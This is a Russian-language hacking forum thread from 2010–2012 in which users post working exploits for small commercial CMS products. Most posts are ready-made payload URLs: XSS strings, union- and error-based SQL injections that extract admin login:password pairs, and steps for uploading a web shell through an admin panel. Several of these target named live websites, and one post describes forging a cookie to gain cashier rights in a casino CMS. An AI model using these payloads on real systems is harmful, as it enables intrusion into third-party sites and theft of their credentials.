ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

06.12.2010, 02:19
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме: 691279
Репутация:
55
|
|
OSG WebShop
офф сайт: http://www.osg.ru/
Xss
Код:
Code:
http://www.demo.osg.ru/forum.html
Вбиваем ">alert('ded-m0r0z')
Уязвимые поля:
Код:
Code:
Ваше имя
Ваш e-mail
Ваш адрес в Internet
ну и гет запрос будет примерно таким:
Код:
Code:
http://www.demo.osg.ru/forum.html?idc=0&stype=0&pgn=1&idbook=97&idmain=0&idmess=0&rnd=14613&pgn=1&s_cf=28%2E50&s_ch=6A675D26682717306851D40C1878BD14&gbmess=%22%3E%3Cscript%3Ealert%28%27ded%2Dm0r0z%27%29%3C%2Fscript%3E&idbook=97&gbwww=%22%3E%3Cscript%3Ealert%28%27ded%2Dm0r
|
|
|

18.12.2010, 04:30
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме: 691279
Репутация:
55
|
|
NReco.Site CMS
офф сайт: nrecosite.com
XSS
Пишем в поиск:
Код:
Code:
alert('ololo')
Гет запрос такой будет:
Код:
Code:
http://www.nrecosite.com/search.aspx/ru?q=alert('ololo')
|
|
|

03.03.2011, 05:56
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме: 1698585
Репутация:
818
|
|
Заливка шелла в Shop-Script PREMIUM. Нужны права Админа.
Админка по умолчании расположена в site.com/admin.php
Заходим в Каталог->Категории и товары->Добавить новый товар. В появившемся окне заполняем форму, как угодно, и главный момент это, ставим галочку на чекбоксе Продукт является программой и заливаем пустой .htaccess дабы переписать существующий .htaccess в папке куда далее зальем наш web-shell.
Повторяем процедуру и уже заливаем шелл.
Шелл заливается в папку : site.com/products_files/ имя загружаемого файла не изменяется.
|
|
|

20.04.2011, 19:22
|
|
Guest
Сообщений: n/a
Провел на форуме: 2301
Репутация:
10
|
|
Zikula CMS Version 1 pXSS:
- zikula.de
- /index.php
- http://demo.zikula.de/index.php?module=benutzer&func=">alert('xss')
|
|
|
|

27.04.2011, 22:49
|
|
Guest
Сообщений: n/a
Провел на форуме: 195266
Репутация:
53
|
|
bcms, быстро cms
офф сайт: http://www.bistro-site.ru/
их хостинг: http://www.bistro-host.ru/
вообще это вебдизовая студия, но у них свой платный двиг.
На большинстве сайтов на странице с новостями.
MySQL inj
Код:
Code:
http://www.linefirm.ru/news/text?newsid=-6+union+select+1,concat_ws(0x3a,login,password),3,4,5,6,7+from+b_admin--
админка: /badmin
Имеется cpanel у сайтов на их хостинге.
Зайдя в диры, можно посмотреть содержимое папок у большинства сайтов(в приведённом мною так не попасть):
/bfiles, /bsystem
в /bfiles складируются любые файлы через админку, но на некоторых сайтах стоят права ток на чтение из этой папки.
на старых версиях двига юзается md5 для хэша, на новых - так и не подобрал(хорошо бы, если и мне скажете, если подберёте)).
|
|
|
|

25.08.2011, 01:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 34733
Репутация:
83
|
|
1) Дата: 25.08.2011
2) Продукт: Официальный сайт . Версия - не известна. StewieEngine Framework
3) Уязвимость: XSS
4) Автор: Фараон
5) Тип: удалённая
6) Опасность: 3
7) Описание: XSS и этим все сказано. Код отсутствует так как cms платная.
8) Эксплоит: http://www.sibcontact.ru/admin/login.php?back=">document.write('LOL');
9) Решение: htmlspecialchars($_GET[back]);
|
|
|
|

15.10.2011, 00:18
|
|
Участник форума
Регистрация: 01.10.2009
Сообщений: 105
Провел на форуме: 559542
Репутация:
94
|
|
NetCat CMS
Уязвимость: Множественное раскрытие путей
Примеры:
/netcat/modules/calendar/showpreview.php?id=-1 (требует прав админа)
/netcat/full.php?classPreview=1
Уязвимость: Инлуд (раскрутить нельзя )
Примеры:
/netcat/modules/netshop/post.php?system=bank (bank - имя скрипта находящегося в каталоге /netcat/modules/netshop/payment)
З.Ы. Все вышеописанные уязвимости присутствуют на офф. сайте - netcat.ru
|
|
|

29.03.2012, 18:46
|
|
Guest
Сообщений: n/a
Провел на форуме: 10816
Репутация:
74
|
|
KASSELER CMS
Официальный сайт: kasseler-cms.net
Версия: 2.2 (последняя на данный момент)
Уязвимость: Активная XSS
Уязвимый параметр: user_gtalk
POST:
Код:
Code:
www.site.com/account/save_controls.html?days=00&months=0&years=00&user_gender=0&user_occupation=&user_interests&user_locality=&user_locality_hk=&user_signature=&language=russian&template=kasseler2&user_gmt=4&hide_user_viewemail=set&hide_user_pm_send=set&user_pm_send=on&hide_user_new_pm_window=set&user_new_pm_window=on&user_email=Ваш_Email@host.com&user_icq=&user_aim=&user_yim=&user_msnm=&user_skype=&user_gtalk=alert('XSS by Mr. Penguin')&user_website=http://&set_avatar=&avatar=animation&userfile=&user_password=&user_password_hk&user_newpassword=&user_newpassword_hk=&user_renewpassword=&user_renewpassword_hk=&hide_user_forum_mail=set&cmd_forum_mail=0
PoC:
Код:
Code:
http://kasseler-cms.net/account/save_controls.html?days=00&months=0&years=00&user_gender=0&user_occupation=&user_interests&user_locality=&user_locality_hk=&user_signature=&language=russian&template=kasseler2&user_gmt=4&hide_user_viewemail=set&hide_user_pm_send=set&user_pm_send=on&hide_user_new_pm_window=set&user_new_pm_window=on&user_email=Ваш_Email@host.com&user_icq=&user_aim=&user_yim=&user_msnm=&user_skype=&user_gtalk=alert('XSS by Mr. Penguin')&user_website=http://&set_avatar=&avatar=animation&userfile=&user_password=&user_password_hk&user_newpassword=&user_newpassword_hk=&user_renewpassword=&user_renewpassword_hk=&hide_user_forum_mail=set&cmd_forum_mail=0
|
|
|
|

05.04.2012, 17:29
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
ZRP CMS Sql-injection
Уязвимость платного ZRP CMS, в файле addbasket.php, в параметре dataID, что позволяет внедрять sql-команды.
Exploit:
Код:
Code:
addcard?dataID=117+and(select+1+from(select+count(*),concat((select+concat(login,0x3a,passwd,0x00)+from+zrp_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
Примеры:
Код:
Code:
http://www.photo[google]festival.info/addcard?dataID=117+and(select+1+from(select+count(*),concat((select+concat(login,0x3a,passwd,0x00)+from+zrp_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
http://www.elex[google]pro.ru/addcard?dataID=117+and(select+1+from(select+count(*),concat((select+concat(login,0x3a,passwd,0x00)+from+zrp_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
http://www.plw[google]ha.kz/addcard?dataID=117+and(select+1+from(select+count(*),concat((select+concat(login,0x3a,passwd,0x00)+from+zrp_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
Админка по адресу /zrp_admin/. Много раскрытии путей... В админке, мягко говоря, п****ц, везде скульи.
Оригинал поста в моем блоге , здесь:
http://dbitems.ru/blog/?x=entry:entry120405-142125
|
|
|
|

06.04.2012, 20:27
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
0
|
|
Движок HLSTATX
exploit
Код:
host/ingame.php?mode=pro ./avatar.jpg
CMS казино
Стать кассиром передав в качестве Cookie username="любое кышы кышы"
Все данные хранятся в не зашифрованном виде.
XSS
kasa/stat.php?user=[xss]
rg=on
kasa/stat2.php?user=[xss]
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|